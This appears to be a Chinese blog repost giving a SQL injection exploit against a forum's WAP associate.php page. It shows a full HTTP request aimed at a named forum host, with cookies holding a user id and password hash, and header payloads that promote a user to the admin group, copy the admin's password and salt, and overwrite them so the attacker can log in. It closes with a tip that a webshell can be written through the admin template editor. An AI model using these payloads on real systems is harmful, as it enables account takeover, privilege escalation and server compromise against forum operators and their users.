鬼仔's Blog

来源：小米's Blog


GET /wap/associate.php?do=1 HTTP/1.1
Host: bbs.hongse.net.cn
Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
Cookie: userid=48855; password=6ef89f8c97b9d6a3599e521712de7903; cpcollapseprefs=;redbbsuserid=48855;redbbspassword=6ef89f8c97b9d6a3599e521712de7903;
X_UP_CALLING_LINE_ID: 0',usergroupid='2' where id='25502'/*
Cookie2: $Version=1
Connection: Keep-Alive

X_UP_CALLING_LINE_ID: 0',yahoo=CONCAT_WS('|',password,salt) where id='1'/*
把id为1的用户的password和salt备份去了yahoo，以|为分割线
X_UP_CALLING_LINE_ID: 0',password='你的密码',salt='你的salt' where id='1'/*
把你的密码和你的Salt替换成ID为1的密码和salt,然后你就可以用你的密码登陆前后台.

PS.后台模板处可以写webshell.